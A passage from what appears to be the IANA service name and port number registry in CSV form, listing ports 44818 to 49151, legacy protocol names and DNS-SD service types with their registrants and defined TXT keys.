assigned this well-formed service name as a replacement for ""EtherNet/IP-2"".",[Brian_Batke_2],[Brian_Batke_2],,,,,,New contact added for port 44818 on 2008-02-01 EtherNet/IP-2,44818,tcp,EtherNet/IP messaging,[Brian_Batke_2],[Brian_Batke_2],,,,,,"New contact added for port 44818 on 2008-02-01 This entry is an alias to ""EtherNet-IP-2"". This entry is now historic, not usable for use with many common service discovery mechanisms." EtherNet-IP-2,44818,udp,"EtherNet/IP messaging IANA assigned this well-formed service name as a replacement for ""EtherNet/IP-2"".",[Brian_Batke_2],[Brian_Batke_2],,,,,,New contact added for port 44818 on 2008-02-01 EtherNet/IP-2,44818,udp,EtherNet/IP messaging,[Brian_Batke_2],[Brian_Batke_2],,,,,,"New contact added for port 44818 on 2008-02-01 This entry is an alias to ""EtherNet-IP-2"". This entry is now historic, not usable for use with many common service discovery mechanisms." ,44819-44899,,Unassigned,,,,,,,, m3da,44900,tcp,M3DA is used for efficient machine-to-machine communications,[Eclipse_Foundation],[Didier_Lahay],2013-02-22,,,,, m3da-disc,44900,udp,M3DA Discovery is used for efficient machine-to-machine communications,[Eclipse_Foundation],[Didier_Lahay],2013-02-22,,,,, ,44901-44999,,Unassigned,,,,,,,, asmp,45000,tcp,NSi AutoStore Status Monitoring Protocol data transfer,[Notable_Solutions_Inc],[Andrew_Andrews],2011-09-01,,,,, asmp-mon,45000,udp,NSi AutoStore Status Monitoring Protocol device monitoring,[Notable_Solutions_Inc],[Andrew_Andrews],2011-09-01,,,,, asmps,45001,tcp,NSi AutoStore Status Monitoring Protocol secure data transfer,[Notable_Solutions_Inc],[Andrew_Andrews],2011-09-01,,,,, ,45001,udp,Reserved,,,,,,,, ,45002-45044,,Unassigned,,,,,,,, synctest,45045,tcp,Remote application control protocol,[Eleks_Ltd],[Andriy_Skop],2013-04-08,,,,, ,45045,udp,Reserved,,,,,,,, ,45046-45053,,Unassigned,,,,,,,, invision-ag,45054,tcp,InVision AG,[Matthias_Schroer],[Matthias_Schroer],,,,,, invision-ag,45054,udp,InVision AG,[Matthias_Schroer],[Matthias_Schroer],,,,,, ,45055-45677,,Unassigned,,,,,,,, eba,45678,tcp,EBA PRISE,[Patrick_Kara],[Patrick_Kara],,,,,, eba,45678,udp,EBA PRISE,[Patrick_Kara],[Patrick_Kara],,,,,, ,45679-45823,,Unassigned,,,,,,,, dai-shell,45824,tcp,Server for the DAI family of client-server products,[Data_Access_Inc],[Adam_Robinson],2012-04-30,,,,, ,45824,udp,Reserved,,,,,,,, qdb2service,45825,tcp,Qpuncture Data Access Service,[Michael_Yun],[Michael_Yun],2007-10-24,,,,, qdb2service,45825,udp,Qpuncture Data Access Service,[Michael_Yun],[Michael_Yun],2007-10-24,,,,, ,45826-45965,,Unassigned,,,,,,,, ssr-servermgr,45966,tcp,SSRServerMgr,[Jeremy_Gilliat],[Jeremy_Gilliat],,,,,, ssr-servermgr,45966,udp,SSRServerMgr,[Jeremy_Gilliat],[Jeremy_Gilliat],,,,,, ,45967-46997,,Unassigned,,,,,,,, spremotetablet,46998,tcp,Connection between a desktop computer or server and a signature tablet to capture handwritten signatures,[SOFTPRO_GmbH],[Christoph_Hipp],2012-07-19,2013-08-02,,,, ,46998,udp,Reserved,,,,,,,, mediabox,46999,tcp,MediaBox Server,[Alexander_Graef],[Alexander_Graef],2004-11,,,,, mediabox,46999,udp,MediaBox Server,[Alexander_Graef],[Alexander_Graef],2004-11,,,,, mbus,47000,tcp,Message Bus,[Dirk_Kutscher],[Dirk_Kutscher],,,,,, mbus,47000,udp,Message Bus,[Dirk_Kutscher],[Dirk_Kutscher],,,,,, winrm,47001,tcp,Windows Remote Management Service,[Ryan_Mack],[Ryan_Mack],2009-04-29,,,,, ,47001,udp,Reserved,,,,,,,, ,47002-47099,,Unassigned,,,,,,,, jvl-mactalk,47100,udp,Configuration of motors connected to Industrial Ethernet,[JVL_Industri_Elektronik],[Kim_Berthelsen],2012-12-21,,,,, ,47100,tcp,Reserved,,,,,,,, ,47101-47556,,Unassigned,,,,,,,, dbbrowse,47557,tcp,Databeam Corporation,[Cindy_Martin],[Cindy_Martin],,,,,, dbbrowse,47557,udp,Databeam Corporation,[Cindy_Martin],[Cindy_Martin],,,,,, ,47558-47623,,Unassigned,,,,,,,, directplaysrvr,47624,tcp,Direct Play Server,[Ajay_Jindal],[Ajay_Jindal],,,,,, directplaysrvr,47624,udp,Direct Play Server,[Ajay_Jindal],[Ajay_Jindal],,,,,, ,47625-47805,,Unassigned,,,,,,,, ap,47806,tcp,ALC Protocol,[Dave_Robin],[Dave_Robin],,,,,, ap,47806,udp,ALC Protocol,[Dave_Robin],[Dave_Robin],,,,,, ,47807,,Unassigned,,,,,,,, bacnet,47808,tcp,Building Automation and Control Networks,[Coleman_Brumley],[Coleman_Brumley],2011-02-10,,,,, bacnet,47808,udp,Building Automation and Control Networks,[Coleman_Brumley],[Coleman_Brumley],2011-02-10,,,,, presonus-ucnet,47809,udp,PreSonus Universal Control Network Protocol,[PreSonus_Audio_Electronics_Inc],[Matthias_Juwan],2013-07-12,,,,, ,47809,tcp,Reserved,,,,,,,, ,47810-47999,,Unassigned,,,,,,,, nimcontroller,48000,tcp,Nimbus Controller,[Carstein_Seeberg_2],[Carstein_Seeberg_2],,,,,, nimcontroller,48000,udp,Nimbus Controller,[Carstein_Seeberg_2],[Carstein_Seeberg_2],,,,,, nimspooler,48001,tcp,Nimbus Spooler,[Carstein_Seeberg_2],[Carstein_Seeberg_2],,,,,, nimspooler,48001,udp,Nimbus Spooler,[Carstein_Seeberg_2],[Carstein_Seeberg_2],,,,,, nimhub,48002,tcp,Nimbus Hub,[Carstein_Seeberg_2],[Carstein_Seeberg_2],,,,,, nimhub,48002,udp,Nimbus Hub,[Carstein_Seeberg_2],[Carstein_Seeberg_2],,,,,, nimgtw,48003,tcp,Nimbus Gateway,[Carstein_Seeberg_2],[Carstein_Seeberg_2],,,,,, nimgtw,48003,udp,Nimbus Gateway,[Carstein_Seeberg_2],[Carstein_Seeberg_2],,,,,, nimbusdb,48004,tcp,NimbusDB Connector,[Stephen_Harrison],[Stephen_Harrison],2011-01-24,,,,, ,48004,udp,Reserved,,,,,,,, nimbusdbctrl,48005,tcp,NimbusDB Control,[Stephen_Harrison],[Stephen_Harrison],2011-01-24,,,,, ,48005,udp,Reserved,,,,,,,, ,48006-48048,,Unassigned,,,,,,,, 3gpp-cbsp,48049,tcp,3GPP Cell Broadcast Service Protocol,[Gert_Thomasen],[Gert_Thomasen],2009-12-07,,,,, ,48049,udp,Reserved,,,,,,,, weandsf,48050,tcp,WeFi Access Network Discovery and Selection Function,[WeFi_Inc],[Eran_Naveh],2013-07-19,,,,, ,48050,udp,Reserved,,,,,,,, ,48051-48127,,Unassigned,,,,,,,, isnetserv,48128,tcp,Image Systems Network Services,[Bengt_Gustafsson],[Bengt_Gustafsson],2006-05,,,,, isnetserv,48128,udp,Image Systems Network Services,[Bengt_Gustafsson],[Bengt_Gustafsson],2006-05,,,,, blp5,48129,tcp,Bloomberg locator,[Albert_Hou],[Albert_Hou],2006-05,,,,, blp5,48129,udp,Bloomberg locator,[Albert_Hou],[Albert_Hou],2006-05,,,,, ,48130-48555,,Unassigned,,,,,,,, com-bardac-dw,48556,tcp,com-bardac-dw,[Nicholas_J_Howes],[Nicholas_J_Howes],,,,,, com-bardac-dw,48556,udp,com-bardac-dw,[Nicholas_J_Howes],[Nicholas_J_Howes],,,,,, ,48557-48618,,Unassigned,,,,,,,, iqobject,48619,tcp,iqobject,[Bjorn_de_Bonnenfant],[Bjorn_de_Bonnenfant],2003-11,,,,, iqobject,48619,udp,iqobject,[Bjorn_de_Bonnenfant],[Bjorn_de_Bonnenfant],2003-11,,,,, ,48620-48652,,Unassigned,,,,,,,, robotraconteur,48653,tcp,Robot Raconteur transport,[Wason_Technology_LLC],[John_Wason],2014-01-27,,,,, robotraconteur,48653,udp,Robot Raconteur transport,[Wason_Technology_LLC],[John_Wason],2014-01-27,,,,, ,48654-48999,,Unassigned,,,,,,,, matahari,49000,tcp,Matahari Broker,[Matahari_Project],[Zane_Bitter],2011-08-31,,,,, ,49000,udp,Reserved,,,,,,,, ,49001-49150,,Unassigned,,,,,,,, ,49151,,IANA Reserved,,,,,,,, argus,,,ARGUS Protocol,,,,,,,, arp,,,Address Resolution Protocol,,,,,,,, bbn-rcc-mon,,,BBN RCC Monitoring,,,,,,,, bootp,,,Bootstrap Protocol,,,,,,,, br-sat-mon,,,Backroom SATNET Monitoring,,,,,,,, cftp,,,CFTP,,,,,,,, chaos,,,CHAOS Protocol,,,,,,,, clock,,,DCNET Time Server Protocol,,,,,,,, cmot,,,Common Mgmnt Info Ser and Prot over TCP/IP,,,,,,,, cookie-jar,,,Authentication Scheme,,,,,,,, dcn-meas,,,DCN Measurement Subsystems Protocol,,,,,,,, dgp,,,Dissimilar Gateway Protocol,,,,,,,, dmf-mail,,,Digest Message Format for Mail,,,,,,,, egp,,,Exterior Gateway Protocol,,,,,,,, ehf-mail,,,Encoding Header Field for Mail,,,,,,,, emcon,,,Emission Control Protocol,,,,,,,, fconfig,,,Fujitsu Config Protocol,,,,,,,, ggp,,,Gateway Gateway Protocol,,,,,,,, hmp,,,Host Monitoring Protocol,,,,,,,, host2-ns,,,Host2 Name Server,,,,,,,, icmp,,,Internet Control Message Protocol,,,,,,,, igmp,,,Internet Group Management Protocol,,,,,,,, igp,,,Interior Gateway Protocol,,,,,,,, imap2,,,Interim Mail Access Protocol version 2,,,,,,,, ip,,,Internet Protocol,,,,,,,, ipcu,,,Internet Packet Core Utility,,,,,,,, ippc,,,Internet Pluribus Packet Core,,,,,,,, ip-arc,,,Internet Protocol on ARCNET,,,,,,,, ip-arpa,,,Internet Protocol on ARPANET,,,,,,,, ip-cmprs,,,Compressing TCP/IP Headers,,,,,,,, ip-dc,,,Internet Protocol on DC Networks,,,,,,,, ip-dvmrp,,,Distance Vector Multicast Routing Protocol,,,,,,,, ip-e,,,Internet Protocol on Ethernet Networks,,,,,,,, ip-ee,,,Internet Protocol on Exp. Ethernet Nets,,,,,,,, ip-fddi,,,Transmission of IP over FDDI,,,,,,,, ip-hc,,,Internet Protocol on Hyperchannnel,,,,,,,, ip-ieee,,,Internet Protocol on IEEE 802,,,,,,,, ip-ipx,,,Transmission of 802.2 over IPX Networks,,,,,,,, ip-mtu,,,IP MTU Discovery Options,,,,,,,, ip-netbios,,,Internet Protocol over NetBIOS Networks,,,,,,,, ip-slip,,,Transmission of IP over Serial Lines,,,,,,,, ip-wb,,,Internet Protocol on Wideband Network,,,,,,,, ip-x25,,,Internet Protocol on X.25 Networks,,,,,,,, irtp,,,Internet Reliable Transaction Protocol,,,,,,,, iso-tp4,,,ISO Transport Protocol Class 4,,,,,,,, larp,,,Locus Address Resoultion Protocol,,,,,,,, leaf-1,,,Leaf-1 Protocol,,,,,,,, leaf-2,,,Leaf-2 Protocol,,,,,,,, loc-srv,,,Location Service,,,,,,,, mail,,,Format of Electronic Mail Messages,,,,,,,, merit-inp,,,MERIT Internodal Protocol,,,,,,,, mib,,,Management Information Base,,,,,,,, mihcs,,,MIH Command Services,,,,,[RFC5679],,, mihes,,,MIH Event Services,,,,,[RFC5679],,, mihis,,,MIH Information Services,,,,,[RFC5679],,, mfe-nsp,,,MFE Network Services Protocol,,,,,,,, mit-subnet,,,MIT Subnet Support,,,,,,,, mux,,,Multiplexing Protocol,,,,,,,, netblt,,,Bulk Data Transfer Protocol,,,,,,,, neted,,,Network Standard Text Editor,,,,,,,, netrjs,,,Remote Job Service,,,,,,,, nfile,,,A File Access Protocol,,,,,,,, nvp-ii,,,Network Voice Protocol,,,,,,,, ospf,,,Open Shortest Path First Interior GW Protocol,,,,,,,, pcmail,,,Pcmail Transport Protocol,,,,,,,, ppp,,,Point-to-Point Protocol,,,,,,,, prm,,,Packet Radio Measurement,,,,,,,, pup,,,PUP Protocol,,,,,,,, quote,,,Quote of the Day Protocol,,,,,,,, rarp,,,A Reverse Address Resolution Protocol,,,,,,,, ratp,,,Reliable Asynchronous Transfer Protocol,,,,,,,, rdp,,,Reliable Data Protocol,,,,,,,, rip,,,Routing Information Protocol,,,,,,,, rvd,,,Remote Virtual Disk Protocol,,,,,,,, sat-expak,,,Satnet and Backroom EXPAK,,,,,,,, sat-mon,,,SATNET Monitoring,,,,,,,, smi,,,Structure of Management Information,,,,,,,, stp,,,Stream Protocol,,,,,,,, sun-rpc,,,SUN Remote Procedure Call,,,,,,,, tcp,,,Transmission Control Protocol,,,,,,,, tcp-aco,,,TCP Alternate Checksum Option,,,,,,,, thinwire,,,Thinwire Protocol,,,,,,,, tp-tcp,,,ISO Transport Service on top of the TCP,,,,,,,, trunk-1,,,Trunk-1 Protocol,,,,,,,, trunk-2,,,Trunk-2 Protocol,,,,,,,, ucl,,,University College London Protocol,,,,,,,, udp,,,User Datagram Protocol,,,,,,,, users,,,Active Users Protocol,,,,,,,, via-ftp,,,VIA Systems-File Transfer Protocol,,,,,,,, visa,,,VISA Protocol,,,,,,,, vmtp,,,Versatile Message Transaction Protocol,,,,,,,, wb-expak,,,Wideband EXPAK,,,,,,,, wb-mon,,,Wideband Monitoring,,,,,,,, xnet,,,Cross Net Debugger,,,,,,,, xns-idp,,,Xerox NS IDP,,,,,,,, 1password,,,1Password Password Manager data sharing and synchronization protocol,[Roustem_Karimov],[Roustem_Karimov],,,,,,Defined TXT keys: None a-d-sync,,,Altos Design Synchronization protocol,[David_Lasker],[David_Lasker],,,,,,Defined TXT keys: None abi-instrument,,,Applied Biosystems Universal Instrument Framework,[Tor_Slettnes],[Tor_Slettnes],,,,,,"Defined TXT keys: product= description= version=" accessdata-f2d,,,FTK2 Database Discovery Service,[Rick_Russell],[Rick_Russell],,,,,,Defined TXT keys: Proprietary accessdata-f2w,,,FTK2 Backend Processing Agent Service,[Rick_Russell],[Rick_Russell],,,,,,Defined TXT keys: Proprietary accessone,,,Strix Systems 5S/AccessOne protocol,[Scott_Herscher_2],[Scott_Herscher_2],,,,,,Defined TXT keys: None accountedge,,,MYOB AccountEdge,,,,,,,,Defined TXT keys: None acrobatsrv,,,Adobe Acrobat,,,,,,,,"Defined TXT keys: type, path, FeedType" acs-ctl-ds,,tcp,Access Control Device,[Honwywell_Security_Group],[John_Dziadosz],2012-04-09,,,,,"Defined TXT keys: MAC=, GW-MAC" acs-ctl-ds,,udp,Access Control Device,[Honwywell_Security_Group],[John_Dziadosz],2012-04-09,,,,,"Defined TXT keys: MAC=, GW-MAC" acs-ctl-gw,,tcp,Access Control Gateway,[Honwywell_Security_Group],[John_Dziadosz],2012-04-09,,,,,"Defined TXT keys: MAC=, GW-MAC" acs-ctl-gw,,udp,Access Control Gateway,[Honwywell_Security_Group],[John_Dziadosz],2012-04-09,,,,,"Defined TXT keys: MAC=, GW-MAC" actionitems,,,ActionItems,[Sailalong_Software],[Sailalong_Software],,,,,,Defined TXT keys: None activeraid,,,Active Storage Proprietary Device Management Protocol,[Skip_Levens],[Skip_Levens],,,,,,Defined TXT keys: None activeraid-ssl,,,Encrypted transport of Active Storage Proprietary Device Management Protocol,[Skip_Levens],[Skip_Levens],,,,,,Defined TXT keys: None addressbook,,,Address-O-Matic,[Massimiliano_Ribuoli],[Massimiliano_Ribuoli],,,,,,Defined TXT keys: None addressbooksrv,,tcp,Address Book Server used for contacts and calendar synchronisation,[AddressBookServer],[Alexander_Hartner],2011-10-14,,,,,"Defined TXT keys: _suffix, _prefix" adnodes,,,"difusi Cloud based plug & play network synchronization protocol, content pool database discovery, and cloudOS SAaS discovery protocol.",[DIFUSI_Inc],[Mike_Wright],2011-11-07,,,,,Defined TXT keys: Proprietary adobe-shadow,,tcp,Adobe Shadow Server,[Adobe_Systems],[Mike_Harris],2012-04-17,,,,,Defined TXT keys: id adobe-vc,,,Adobe Version Cue,,,,,,,,"Defined TXT keys: txtvers=1, name, version, build" adisk,,,Automatic Disk Discovery,[Bob_Bradley_2],[Bob_Bradley_2],,,,,,"Defined TXT keys: sys, dkX" adpro-setup,,,ADPRO Security Device Setup,[Patrick_Noffke],[Patrick_Noffke],,,,,,"Defined TXT keys: txtvers, type" aecoretech,,,Apple Application Engineering Services,[Hani_Abdelazim],[Hani_Abdelazim],,,,,,Defined TXT keys: None aeroflex,,,Aeroflex instrumentation and software,[David_Hagood],[David_Hagood],,,,,,"Defined TXT keys: orb_server= (optional) CORBA ORB server used for resource discovery product_id= (optional) ID of licensed product txtvers=""*IDN?="" (optional) as per LXI specification (for not yet LXI compatible instruments)" aerohive-proxy,,tcp,Aerohive Proxy Configuration Service,[Aerohive_Networks],[Matthew_Gast],2012-05-31,,,,,"Defined TXT keys: name, port, username" airdrop,,tcp,Airdrop,[Apple_Inc],[Marc_Krochmal_2],2012-03-02,,,,,"Defined TXT keys: flags, phash, ehash, cname" airplay,,tcp,Protocol for streaming of audio/video content,[Apple_Inc_2],[Bob_Bradley_3],2012-09-19,,,,,"Defined TXT keys: am, cn, et, ft, fv, md, pk, pw, sf, tp, vn, vs" airplay,,udp,Protocol for streaming of audio/video content,[Apple_Inc_2],[Bob_Bradley_3],2012-09-19,,,,,"Defined TXT keys: am, cn, et, ft, fv, md, pk, pw, sf, tp, vn, vs" airport,,,AirPort Base Station,[Bob_Bradley_2],[Bob_Bradley_2],,,,,,Defined TXT keys: waMA; airpreview,,tcp,Coda AirPreview,[Panic_Inc],[Cabel_Sasser],2012-07-19,,,,,"Defined TXT keys: hasCamera, name, UUID" airprojector,,,AirProjector,[Yoshinori_Nakayama],[Yoshinori_Nakayama],,,,,,"Defined TXT keys: mac= ip= note= use= mainprog=
bootprog=" airsharing,,,Air Sharing,[Erik_Rogers][Dave_Howell],[Erik_Rogers][Dave_Howell],,,,,,Defined TXT keys: None airsharingpro,,,Air Sharing Pro,[Erik_Rogers][Dave_Howell],[Erik_Rogers][Dave_Howell],,,,,,Defined TXT keys: None aloe-gwp,,tcp,Aloe Gateway Protocol,[Layered_Logic],[Brooks_Bell],2012-01-04,,,,,Defined TXT keys: Version aloe-pp,,tcp,Aloe Pairing Protocol,[Layered_Logic],[Brooks_Bell],2012-01-04,,,,,"Defined TXT keys: Version, DeviceName, DeviceModel, DeviceSystem, DeviceSystemVersion, AppName, AppVersion" amba-cam,,udp,Ambarella Cameras,[Louis_Sun],[Louis_Sun],,,,,,"Defined TXT keys: product= description= version=" amiphd-p2p,,,"P2PTapWar Sample Application from ""iPhone SDK Development"" Book",[Chris_Adamson],[Chris_Adamson],,,,,,Defined TXT keys: None ams-htm,,,Proprietary protocol for Accu-Med HTM,[AccuMed_Services],[Sam_Carleton_2],2011-10-20,,,,,Defined TXT keys: None animolmd,,,Animo License Manager,[Phil_Barrett],[Phil_Barrett],,,,,,Defined TXT keys: None animobserver,,,Animo Batch Server,[Phil_Barrett],[Phil_Barrett],,,,,,Defined TXT keys: None anquetsync,,,Anquet map synchronization between desktop and handheld devices,[Paul_Lesurf],[Paul_Lesurf],,,,,,Defined TXT keys: Proprietary antrmai,,tcp,ANT Galio web services,[ANT_Software],[Simon_Middleton],2012-12-06,,,,,"Defined TXT keys: txtvers, man" appelezvous,,,Appelezvous,[Marco_Piovanelli],[Marco_Piovanelli],,,,,,Defined TXT keys: None apple-ausend,,,Apple Audio Units,[James_McCartney],[James_McCartney],,,,,,Defined TXT keys: None apple-mobdev,,tcp,Apple Mobile Device Protocol,[Apple_2],[Paul_Chinn][Justin_Ko],2011-10-20,,,,,Defined TXT keys: None apple-midi,,udp,Apple MIDI,[Doug_Wyatt],[Doug_Wyatt],,,,,,Defined TXT keys: None applerdbg,,,Apple Remote Debug Services (OpenGL Profiler),[Dave_Springer],[Dave_Springer],,,,,,Defined TXT keys: None appletv,,,Apple TV,[Amandeep_Jawa_3],[Amandeep_Jawa_3],,,,,,"Defined TXT keys: txtvers, PrVs, OSsi, MniT" appletv-itunes,,,Apple TV discovery of iTunes,[Amandeep_Jawa_3],[Amandeep_Jawa_3],,,,,,Defined TXT keys: txtvers appletv-pair,,,Apple TV Pairing,[Amandeep_Jawa_3],[Amandeep_Jawa_3],,,,,,Defined TXT keys: txtvers aquamon,,,AquaMon,,,,,,,,Defined TXT keys: None arcnet,,udp,Arcturus Networks Inc. Hardware Services,[Arcturus_Networks_Inc],[Michael_Durrant],2011-10-20,,,,,Defined TXT keys: None arn,,tcp,Active Registry Network for distribution of values and streams,[Mictron],[Michael_Wiklund],2013-10-17,,,,,Defined TXT keys: None aroundsound,,,AroundSound's information sharing protocol,[Winzig_LLC],[Around_Sound],2011-10-20,,,,,Defined TXT keys: Proprietary astnotify,,udp,Asterisk Caller-ID Notification Service,[Sven_Slezak],[Sven_Slezak],,,,,,"Defined TXT keys: prefix= (numeric, additionally '+')" astralite,,,Astralite,[Tongji_University],[Tongji_University],,,,,,Defined TXT keys: None async,,,address-o-sync,[Markus_Brand],[Markus_Brand],,,,,,Defined TXT keys: None atlassianapp,,,"Atlassian Application (JIRA, Confluence, Fisheye, Crucible, Crowd, Bamboo) discovery service",[Denise_Fernandez],[Denise_Fernandez],,,,,,Defined TXT keys: app.url av,,,Allen Vanguard Hardware Service,[Mike_Bush],[Mike_Bush],,,,,,Defined TXT keys: Proprietary avatars,,tcp,Libravatar federated avatar hosting service.,[libravatar_org],[Francois_Marier],2011-10-11,,,,,Defined TXT keys: none avatars-sec,,tcp,Libravatar federated avatar hosting service.,[libravatar_org],[Francois_Marier],2011-10-11,,,,,Defined TXT keys: none axis-video,,,Axis Video Cameras,[Kristina_Sten],[Kristina_Sten],,,,,,Defined TXT keys: None b3d-convince,,,3M Unitek Digital Orthodontic System,[Rajiv_Aaron_Manglani],[Rajiv_Aaron_Manglani],,,,,,"Defined TXT keys: txtvers=1, protovers=, guid=<32 hex digits>" babyphone,,,BabyPhone,[Johan_Kool],[Johan_Kool],,,,,,Defined TXT keys: None barroomcomedy,,tcp,Peer to peer file sharing for a media player application,[Fred_Zimmerman],[Fred_Zimmerman],2013-11-05,,,,,Defined TXT keys: None bcloud-server,,tcp,Buddycloud Server Delegation,[buddycloud],[Simon_Tennant_2],2014-06-19,,,,,"Defined TXT keys: v, host" bdsk,,,BibDesk Sharing,[Adam_Maxwell],[Adam_Maxwell],,,,,,"Defined TXT keys: txtvers, authenticate" beacon,,,Beacon Remote Service,[Jeffrey_Sadeli],[Jeffrey_Sadeli],,,,,,"Defined TXT keys: version=, company=" beamer,,,Beamer Data Sharing Protocol,[Frank_Szczerba],[Frank_Szczerba],,,,,,Defined TXT keys: None beatpack,,,BeatPack Synchronization Server for BeatMaker,[Mathieu_Garcia],[Mathieu_Garcia],,,,,,Defined TXT keys: None beatsdirect,,tcp,Beats Direct allows for the discovery and control of devices,[Beats_Electronics_LLC],[Eddie_Borjas],2013-06-03,,,,,Defined TXT keys: None beep,,,Xgrid Technology Preview,[David_Kramer_2],[David_Kramer_2],,,,,,Defined TXT keys: None bender,,,Bender Communication Protocol,[Bender_GmbH_Co_KG],[Markus_Kremer],2013-10-15,,,,,Defined TXT keys: product version bus id featuremask bfagent,,,BuildForge Agent,[Joe_Senner_2],[Joe_Senner_2],,,,,,Defined TXT keys: None bigbangchess,,,Big Bang Chess,[Freeverse_Software],[Freeverse_Software],,,,,,Defined TXT keys: None bigbangmancala,,,Big Bang Mancala,[Freeverse_Software],[Freeverse_Software],,,,,,Defined TXT keys: None bitflit,,tcp,Data transfer service,[Ramesh_Gupta],[Ramesh_Gupta],2012-02-21,,,,,"Defined TXT keys: provider, vendor, user, host, deploy, prototype, schedule" bittorrent,,,BitTorrent Zeroconf Peer Discovery Protocol,[Robin_Perkins],[Robin_Perkins],,,,,,Defined TXT keys: None blackbook,,,Little Black Book Information Exchange Protocol,[David_HM_Spector][Paul_M_Franceus],[David_HM_Spector][Paul_M_Franceus],,,,,,"Defined TXT keys: product= description= version= protovers=" bluevertise,,udp,BlueVertise Network Protocol (BNP),[Fabrizio_Guglielmino],[Fabrizio_Guglielmino],,,,,,Defined TXT keys: role= boardplus,,tcp,board plus application transfer protocol,[CX5_SOFTWARE],[Yohei_Yoshihara],2013-02-04,,,,,Defined TXT keys: None booked-sync,,tcp,Booked communication protocol - Sharing And Sync Service,[Sören_Havemester],[Sören_Havemester],2013-02-18,,,,,"Defined TXT keys: Edition, Version, Public Shares, Machine ID, Machine Name" bookworm,,,Bookworm Client Discovery,[Arne_Dirks],[Arne_Dirks],,,,,,Defined TXT keys: flavors boundaryscan,,udp,Proprietary,[Uwe_Ziegler],[Uwe_Ziegler],,,,,,"Defined TXT keys: blocked=, version=" bousg,,,Bag Of Unusual Strategy Games,,,,,,,,Defined TXT keys: None boutfitness,,tcp,Bout Fitness Synchronization Service,[Bout_Fitness_LLC],[Jesse_Curry],2014-06-16,,,,,Defined TXT keys: None boutfitness,,udp,Bout Fitness Synchronization Service,[Bout_Fitness_LLC],[Jesse_Curry],2014-06-16,,,,,Defined TXT keys: None boxraysrvr,,tcp,Boxray Devices Host Server,[Caprice_Productions],[Lance_Drake],2012-07-05,,,,,Defined TXT keys: none bri,,,RFID Reader Basic Reader Interface,[Thaddeus_Ternes],[Thaddeus_Ternes],,,,,,Defined TXT keys: None bridgeprotocol,,tcp,JSON RPC Bridge Protocol,[Michel_Stam_2],[Michel_Stam_2],2012-11-20,,,,,"Defined TXT keys: path, version" bsqdea,,,Backup Simplicity,[Qdea],[Qdea],,,,,,Defined TXT keys: None btp,,tcp,Beats Transfer Protocol allows for the discovery and control of devices,[Beats_Electronics_LLC_2],[Yunho_Huh],2014-02-17,2014-06-27,,,,Defined TXT keys: None buddycloud-api,,tcp,buddycloud API,[buddycloud],[Simon_Tennant],2013-05-20,,,,,"Defined TXT keys: v, host, protocol, path, port" caldav,,tcp,Calendaring Extensions to WebDAV (CalDAV) - non-TLS,[IESG],[IETF_Chair],2012-02-17,,[RFC6764],,,This is an extension of the http service. Defined TXT keys: path= caldavs,,tcp,Calendaring Extensions to WebDAV (CalDAV) - over TLS,[IESG],[IETF_Chair],2012-02-17,,[RFC6764],,,This is an extension of the https service. Defined TXT keys: path= caltalk,,,CalTalk,[Joe_Groff],[Joe_Groff],,,,,,Defined TXT keys: None carddav,,tcp,vCard Extensions to WebDAV (CardDAV) - non-TLS,[IESG],[IETF_Chair],2012-02-17,,[RFC6352],,,This is an extension of the http service. Defined TXT keys: path= carddavs,,tcp,vCard Extensions to WebDAV (CardDAV) - over TLS,[IESG],[IETF_Chair],2012-02-17,,[RFC6352],,,This is an extension of the https service. Defined TXT keys: path= cardsend,,,Card Send Protocol,[Jeff_Grossman],[Jeff_Grossman],,,,,,Defined TXT keys: Proprietary carousel,,tcp,Carousel Player Protocol,[Tightrope_Media_Systems],[Scott_Jann],2011-10-17,,,,,Defined TXT keys: None cctv,,,IP and Closed-Circuit Television for Securitiy applications,[Frank_Rottmann],[Frank_Rottmann],,,,,,"Defined TXT keys: u=, p=, path=" cheat,,,The Cheat,[Chaz_McGarvey],[Chaz_McGarvey],,,,,,Defined TXT keys: None chess,,,Project Gridlock,,,,,,,,Defined TXT keys: None chfts,,,Fluid Theme Server,,,,,,,,Defined TXT keys: None chili,,,The CHILI Radiology System,[Andre_Schroter],[Andre_Schroter],,,,,,Defined TXT keys: None ciao,,tcp,Ciao Arduino Protocol,[Mike_Colagrosso],[Mike_Colagrosso],2011-10-24,,,,,Defined TXT keys: see www.ciaoapp.com cip4discovery,,,Discovery of JDF (CIP4 Job Definition Format) enabled devices,[Stefan_Daun],[Stefan_Daun],,,,,,Defined TXT keys: None clipboard,,,Clipboard Sharing,,,,,,,,Defined TXT keys: None clique,,udp,Clique Link-Local Multicast Chat Room,[Telepathy_project],[Telepathy_project],,,,,,Defined TXT keys: see http://telepathy.freedesktop.org/xmpp/clique clscts,,,Oracle CLS Cluster Topology Service,[David_Brower],[David_Brower],,,,,,Defined TXT keys: None collection,,,Published Collection Object,[Brady_Anderson],[Brady_Anderson],,,,,,Defined TXT keys: version=? com-ocs-es-mcc,,,ElectraStar media centre control protocol,[OC],[OC],,,,,,Defined TXT keys: None contactserver,,,Now Contact,,,,,,,,Defined TXT keys: None coolanetaudio,,tcp,Coolatoola Network Audio,[Coolatoola.com],[Tim_Hewett],2014-01-03,,,,,Defined TXT keys: None corroboree,,,Corroboree Server,[Heath_Raftery],[Heath_Raftery],,,,,,Defined TXT keys: None cpnotebook2,,,NoteBook 2,[Circus_Ponies_Suppor],[Circus_Ponies_Suppor],,,,,,Defined TXT keys: None csi-mmws,,tcp,Canfield Scientific Inc - Mirror Mobile Web Services,[Canfield_Scientific_Inc],[James_Crismale],2013-07-02,,,,,Defined TXT keys: path cw-codetap,,,CodeWarrior HTI Xscale PowerTAP,[Ted_Woodward],[Ted_Woodward],,,,,,Defined TXT keys: None cw-dpitap,,,CodeWarrior HTI DPI PowerTAP,[Ted_Woodward],[Ted_Woodward],,,,,,Defined TXT keys: None cw-oncetap,,,CodeWarrior HTI OnCE PowerTAP,[Ted_Woodward],[Ted_Woodward],,,,,,Defined TXT keys: None cw-powertap,,,CodeWarrior HTI COP PowerTAP,[Ted_Woodward],[Ted_Woodward],,,,,,Defined TXT keys: None cytv,,,CyTV - Network streaming for Elgato EyeTV,[Andreas_Junghans],[Andreas_Junghans],,,,,,Defined TXT keys: None dacp,,,Digital Audio Control Protocol (iTunes),[Amandeep_Jawa_3],[Amandeep_Jawa_3],,,,,,"Defined TXT keys: txtvers, Ver, DbId" dancepartner,,,Dance partner application for iPhone,[Rory_McClure],[Rory_McClure],,,,,,Defined TXT keys: None dataturbine,,,Open Source DataTurbine Streaming Data Middleware,[Tony_Fountain],[Tony_Fountain],,,,,,Defined TXT keys: None dbaudio,,tcp,d&b audiotechnik remote 